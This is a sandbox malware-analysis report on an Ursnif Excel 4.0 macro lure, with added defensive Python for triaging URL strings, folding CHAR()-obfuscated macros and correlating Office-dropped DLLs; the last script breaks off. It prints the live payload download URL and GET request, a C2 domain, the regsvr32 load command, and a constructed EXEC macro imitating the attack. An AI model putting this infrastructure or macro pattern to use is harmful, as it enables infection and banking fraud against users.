
# Analysis Report Rrapporto.xlsb

## Overview

### General Information

Sample Name: Rrapporto.xlsb
Analysis ID: 316011
MD5: 4dddb0320eac6050d6360c92c104d05c
SHA1: 816db7af62de3dc200b88357a5341c6ce184cc93
SHA256: ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f

### Detection

Hidden Macro 4.0, Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

### Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses code obfuscation techniques (call, push, ret)

### Classification

System is w10x64

EXCEL.EXE (PID: 5716 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
regsvr32.exe (PID: 1620 cmdline: regsvr32 -s C:\ProgramData\Dori.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
iexplore.exe (PID: 5104 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 5900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
iexplore.exe (PID: 1296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 5428 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
iexplore.exe (PID: 2856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
iexplore.exe (PID: 4676 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 4176 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
iexplore.exe (PID: 5492 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 5844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
iexplore.exe (PID: 4476 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 1056 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

## Malware Configuration

No configs have been found

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |

The report contains 29 such entries; the first five are shown.

## Sigma Overview

### System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell
 Source: Process started
 Author: Michael Haag, Florian Roth, Markus Neis
 Data:
 Command: regsvr32 -s C:\ProgramData\Dori.ocx
 CommandLine: regsvr32 -s C:\ProgramData\Dori.ocx
 CommandLine|base64offset|contains: ,
 Image: C:\Windows\SysWOW64\regsvr32.exe
 NewProcessName: C:\Windows\SysWOW64\regsvr32.exe
 OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe
 ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
 ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
 ParentProcessId: 5716
 ProcessCommandLine: regsvr32 -s C:\ProgramData\Dori.ocx
 ProcessId: 1620

## Signature Overview

### AV Detection:

 Antivirus detection for URL or domain
 Source: http://45.138.72.84/10.11nov322.gif Avira URL Cloud: Label: malware
 Antivirus or Machine Learning detection for unpacked file
 Source: 1.2.regsvr32.exe.320000.1.unpack Avira: Label: TR/Patched.Ren.Gen

### Software Vulnerabilities:

 Document exploit detected (drops PE files)
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: 10.11nov322[1].gif.0.dr
 Document exploit detected (process start blacklist hit)

### Networking:

 Creates a COM Internet Explorer object
 Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:52 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif
 JA3 SSL client fingerprint seen in connection with other malware
 Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
 Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
 Connects to IPs without corresponding DNS lookups
 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84
 Source: global traffic HTTP traffic detected: GET /10.11nov322.gif HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.138.72.84 Connection: Keep-Alive
 Found strings which match to known social media urls
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: bonderlas.xyz
 Urls found in memory or binary data
Strings found in binary or memory (one entry per unique string and source):
- http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html; (source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp)
- http://45.138.72.84/10.11nov322.gif (source: sharedStrings.bin)
- http://apps.identrust.com/roots/dstrootcax3.p7c0 (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://cert.int-x3.letsencrypt.org/0 (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://cps.letsencrypt.org0 (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://cps.root-x1.letsencrypt.org0 (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://crl.identrust.com/DSTROOTCAX3CRL.crl0 (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s (source: Dori.ocx.0.dr)
- http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# (source: Dori.ocx.0.dr)
- http://isrg.trustid.ocsp.identrust.com0; (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://ocsp.int-x3.letsencrypt.org0/ (source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp)
- http://ocsp.sectigo.com0 (source: Dori.ocx.0.dr)
- http://www.amazon.com/ (source: msapplication.xml.5.dr)
- http://www.google.com/ (source: msapplication.xml1.5.dr)
- http://www.live.com/ (source: msapplication.xml2.5.dr)
- http://www.nytimes.com/ (source: msapplication.xml3.5.dr)
- http://www.reddit.com/ (source: msapplication.xml4.5.dr)
- http://www.twitter.com/ (source: msapplication.xml5.5.dr)
- http://www.wikipedia.com/ (source: msapplication.xml6.5.dr)
- http://www.youtube.com/ (source: msapplication.xml7.5.dr)
- https://bonderlas.xyz (source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp)
- https://bonderlas.xyz/ (source: regsvr32.exe, 00000001.00000003.906109706.000000000272E000.00000004.00000001.sdmp; regsvr32.exe, 00000001.00000003.757764964.0000000002747000.00000004.00000001.sdmp)
- https://bonderlas.xyz/U (source: regsvr32.exe, 00000001.00000003.792943006.0000000002747000.00000004.00000001.sdmp)
- https://bonderlas.xyz/index.htm (source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp; regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp; ~DF275CD125B53CA979.TMP.14.dr)
- https://bonderlas.xyz/index.htm19j% (source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp)
- https://bonderlas.xyz/index.htmRoot (source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr)
- https://bonderlas.xyz/index.htma; (source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp)
- https://bonderlas.xyz/index.htmh (source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp)
- https://bonderlas.xyz/index.htmindex.htm (source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr)
- https://bonderlas.xyz/index.htmne (source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp)
- https://bonderlas.xyz/index.htmr= (source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp)
- https://sectigo.com/CPS0 (source: Dori.ocx.0.dr)
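The listing above mixes four kinds of string, and only two of them are indicators. The Let's Encrypt, IdenTrust and Sectigo URLs are CRL, OCSP and CPS pointers carried inside embedded X.509 certificates: the trailing `0` is the 0x30 tag byte of the next DER element, and the `s` or `#` after it is that element's length byte, which is why they read `crl0s` and `crt0#`. The `msapplication.xml` entries are Internet Explorer's default tile files and appear on any host where iexplore.exe runs. What remains is the download URL on 45.138.72.84, which sits in the workbook's `sharedStrings.bin` and is therefore recoverable without running the macro, the C2 host bonderlas.xyz with memory-adjacent junk glued to each copy, and a printf-style request template. The script below is an added example, not part of the Joe Sandbox report; it re-types a subset of the strings above as constructed input, and the category rules and the CA allow-list are its own assumptions.

```python
"""Triage of raw URL strings lifted from a sandbox run.

Added example, not part of the Joe Sandbox report. The strings are a subset
of the listing above, re-typed with the trailing bytes the report shows;
the categories and the CA allow-list are this example's own assumptions,
not Joe Sandbox logic.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# (source artifact, string exactly as found) - re-typed from the listing above
STRINGS = [
    ("regsvr32.exe memory dump", "http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;"),
    ("sharedStrings.bin", "http://45.138.72.84/10.11nov322.gif"),
    ("regsvr32.exe memory dump", "http://apps.identrust.com/roots/dstrootcax3.p7c0"),
    ("regsvr32.exe memory dump", "http://cps.letsencrypt.org0"),
    ("regsvr32.exe memory dump", "http://isrg.trustid.ocsp.identrust.com0;"),
    ("Dori.ocx", "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s"),
    ("Dori.ocx", "https://sectigo.com/CPS0"),
    ("msapplication.xml.5.dr", "http://www.amazon.com/"),
    ("msapplication.xml1.5.dr", "http://www.google.com/"),
    ("regsvr32.exe memory dump", "https://bonderlas.xyz"),
    ("regsvr32.exe memory dump", "https://bonderlas.xyz/index.htm19j%"),
    ("{847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr", "https://bonderlas.xyz/index.htmRoot"),
]

# Assumption: CAs whose CRL/OCSP/CPS URLs are expected inside embedded certificates.
CA_DOMAINS = ("letsencrypt.org", "identrust.com", "sectigo.com")
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def host_of(s):
    """Hostname of a raw memory string, cut at the first character that
    cannot be part of a hostname. Strings carved from memory are not
    terminated where the URL ends, so ';' or a DER tag byte may trail it."""
    host = urlsplit(s).hostname or ""
    return re.sub(r"[^a-z0-9.\-].*$", "", host)


def classify(source, s):
    if re.search(r"%[sudx]", s):
        return "c2_request_template"   # printf-style template, filled in at run time
    if source.startswith("msapplication.xml"):
        return "browser_default"       # IE tile XML, written by iexplore.exe on any host
    host = host_of(s)
    # Substring match on purpose: a URL inside an X.509 extension is followed
    # by the next DER element, whose tag byte 0x30 renders as '0' and stays
    # glued to the host (cps.letsencrypt.org0).
    if any(d in host for d in CA_DOMAINS):
        return "x509_chain_artifact"
    if IP_HOST.match(host):
        return "payload_download"
    return "c2_candidate"


def triage(pairs):
    """Group strings by category. Network categories are keyed by host so the
    many bonderlas.xyz variants (index.htm19j%, index.htmRoot, ...) collapse
    into one indicator; the payload URL and the template are kept verbatim."""
    out = defaultdict(set)
    for source, s in pairs:
        cat = classify(source, s)
        if cat in ("c2_request_template", "payload_download"):
            out[cat].add(s)
        elif cat == "x509_chain_artifact":
            out[cat].add(host_of(s).rstrip("0"))   # drop the trailing DER byte
        else:
            out[cat].add(host_of(s))
    return {cat: sorted(v) for cat, v in out.items()}


if __name__ == "__main__":
    for cat, items in triage(STRINGS).items():
        print(f"{cat}: {', '.join(items)}")
```

The host-keyed grouping is what makes the output usable: a dozen `bonderlas.xyz/index.htm...` variants become one C2 indicator, and the certificate URLs are set aside instead of being blocklisted. The Sectigo code-signing CRL inside Dori.ocx says the dropped module carries a Sectigo-issued signature, which is worth checking with signtool before trusting an allow-list keyed on signer.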
Uses HTTPS
- Source: unknown. Network traffic detected: HTTP traffic on port 443, in both directions, with local ports 49716, 49717, 49722, 49734, 49735, 49736, 49737 and 49738

### Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match. File sources (type: MEMORY):
- 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp
- Process Memory Space: regsvr32.exe PID: 1620

### E-Banking Fraud:

Yara detected Ursnif
Source: Yara match. File sources (type: MEMORY):
- 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp
- 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp
- Process Memory Space: regsvr32.exe PID: 1620

### System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
- Source: Screenshot number 4, OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click
- Source: Screenshot number 4, OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
Found Excel 4.0 Macro with suspicious formulas
- Source: Rrapporto.xlsb (initial sample): EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
- Source: Rrapporto.xlsb (initial sample): Sheet size: 583568
Found obfuscated Excel 4.0 Macro
- Source: Rrapporto.xlsb (initial sample): High usage of CHAR() function: 97
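The three macro signatures above describe the standard Excel 4.0 (XLM) lure: a hidden macro sheet whose command string is assembled at run time from CHAR() codes and cell references, so a static scan of the cells never sees the executable name or the drop path, and a final EXEC call runs the result. The folding logic below is an added example and not part of the Joe Sandbox report. The report does not reproduce the sample's formulas, so the sheet in the example is constructed to imitate the described pattern (CHAR() chains, cell references, a trailing EXEC) and the command it rebuilds mirrors the regsvr32 load of the dropped Dori.ocx; the DANGEROUS function list is an assumption. For a real .xlsb the formulas have to be extracted first, for instance with XLMMacroDeobfuscator; this code only folds what it is handed.

```python
"""Folding CHAR()-obfuscated Excel 4.0 (XLM) formulas.

Added example, not part of the Joe Sandbox report. The sheet below is
constructed: the report does not reproduce the sample's formulas, so these
cells only imitate the pattern its signatures describe (CHAR() chains,
cell references, a final EXEC).
"""
import re

# Constructed cells; the command they rebuild mirrors the regsvr32 load of
# the dropped Dori.ocx described in this report.
SHEET = {
    "A1": "=CHAR(114)&CHAR(101)&CHAR(103)&CHAR(115)&CHAR(118)&CHAR(114)&CHAR(51)&CHAR(50)",
    "A2": "=CHAR(32)&CHAR(45)&CHAR(115)&CHAR(32)",
    "A3": '="C:\\ProgramData\\"&CHAR(68)&CHAR(111)&CHAR(114)&CHAR(105)&".ocx"',
    "A4": "=EXEC(A1&A2&A3)",
    "A5": "=HALT()",
}

TOKEN = re.compile(r'CHAR\((\d+)\)|"((?:[^"]|"")*)"|([A-Z]+\d+)|(&)|(\s+)')
FUNC_CALL = re.compile(r"^([A-Z][A-Z0-9.]*)\((.*)\)$", re.S)
# Assumption: the XLM functions worth flagging once their argument is readable.
DANGEROUS = {"EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL", "RUN", "FOPEN", "FWRITE"}


def evaluate(expr, sheet, seen):
    """Fold an expression made only of CHAR(n), string literals, cell
    references and the & operator. Returns the string, or None when the
    expression contains anything else (a function call, arithmetic, ...)."""
    out, pos, need_operand = [], 0, True
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            return None
        pos = m.end()
        code, literal, ref, amp, ws = m.groups()
        if ws is not None:
            continue
        if amp is not None:
            if need_operand:
                return None
            need_operand = True
            continue
        if not need_operand:
            return None
        need_operand = False
        if code is not None:
            out.append(chr(int(code)))
        elif literal is not None:
            out.append(literal.replace('""', '"'))  # XLM escapes a quote by doubling it
        else:
            if ref in seen or ref not in sheet:     # cycle or dangling reference
                return None
            value = cell_value(ref, sheet, seen + (ref,))
            if value is None:
                return None
            out.append(value)
    return None if need_operand else "".join(out)


def cell_value(ref, sheet, seen):
    """String value of a cell: a constant as-is, a formula folded if possible."""
    formula = sheet[ref]
    if not formula.startswith("="):
        return formula
    return evaluate(formula[1:], sheet, seen)


def deobfuscate(sheet):
    """Return (decoded cells, flagged calls). A cell that folds to a string is
    rewritten as that literal; a call whose argument folds is rewritten with
    the literal argument; anything else is left untouched."""
    decoded, flagged = {}, []
    for ref, formula in sheet.items():
        decoded[ref] = formula
        if not formula.startswith("="):
            continue
        body = formula[1:]
        value = evaluate(body, sheet, (ref,))
        if value is not None:
            decoded[ref] = f'="{value}"'
            continue
        call = FUNC_CALL.match(body)
        if call:
            name, arg = call.group(1), evaluate(call.group(2), sheet, (ref,))
            if arg is not None:
                decoded[ref] = f'={name}("{arg}")'
            if name in DANGEROUS:
                flagged.append((ref, decoded[ref]))
    return decoded, flagged


def char_usage(sheet):
    """Count CHAR() calls, the figure the sandbox reports as 'High usage of CHAR()'."""
    return sum(f.upper().count("CHAR(") for f in sheet.values())


if __name__ == "__main__":
    cells, hits = deobfuscate(SHEET)
    for ref, text in cells.items():
        print(ref, text)
    print("CHAR() calls:", char_usage(SHEET), "flagged:", hits)
```

The folder deliberately refuses anything it does not understand (a nested function, arithmetic, a reference cycle) rather than guessing, so a cell it rewrites is always exactly what Excel would have concatenated. Real samples also spread the string across rows and use FORMULA() to write the next stage into other cells at run time; those need a real XLM emulator, and the 583568-byte hidden sheet reported above is a hint that this sample pads the macro sheet with filler to make that emulation slow.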
Office process drops PE file
- Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE. File created: C:\ProgramData\Dori.ocx
- Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE. File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif
Writes or reads registry keys via WMI
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
- Source: C:\Windows\SysWOW64\regsvr32.exe. WMI registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Note: because these writes go through IWbemServices::ExecMethod on StdRegProv, the registry operation is carried out by the WMI provider host (WmiPrvSE.exe), not by regsvr32.exe itself. Endpoint rules that attribute registry writes to the calling process image will see WmiPrvSE.exe as the writer, so the SetBinaryValue and SetStringValue calls here are better hunted through WMI-Activity logging or by auditing the written values directly.
Dropped file seen in connection with other malware
- Source: Joe Sandbox View. Dropped file: C:\ProgramData\Dori.ocx, SHA256 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
- Source: Joe Sandbox View. Dropped file: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif, SHA256 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93

Both files carry the same SHA256: the ".gif" in the IE cache is the download from http://45.138.72.84/10.11nov322.gif, and C:\ProgramData\Dori.ocx is that same PE copied out of the cache and renamed before regsvr32.exe loads it. One hash therefore covers both the network artifact and the on-disk module.
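The chain in this section (EXCEL.EXE writes a PE into C:\ProgramData, a child regsvr32.exe then loads it) is detectable from process-creation and file-creation telemetry alone, without the sandbox's memory view. The detector below is an added example and not part of the Joe Sandbox report. Its event stream is constructed to mirror the chain described above, with field names taken from Sysmon's ProcessCreate (EventID 1) and FileCreate (EventID 11); the PIDs, the benign control event and the list of user-writable directory prefixes are assumptions.

```python
"""Correlating an Office-dropped file with its regsvr32 load.

Added example; it is not part of the Joe Sandbox report. The event stream is
constructed to mirror the chain documented above (EXCEL.EXE writes Dori.ocx
into ProgramData, regsvr32.exe then loads it) and is not real telemetry.
Field names follow Sysmon's ProcessCreate (EventID 1) and FileCreate
(EventID 11); PIDs and the benign control event are invented.
"""
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "cmd.exe", "powershell.exe", "certutil.exe"}
# Assumption: prefixes of directories a non-elevated user can write to.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
# Quoted paths may contain spaces; unquoted ones end at whitespace.
PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\\S+)')

SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 4100,
     "Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "TargetFilename": r"C:\ProgramData\Dori.ocx"},
    {"EventID": 1, "ProcessId": 4188,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
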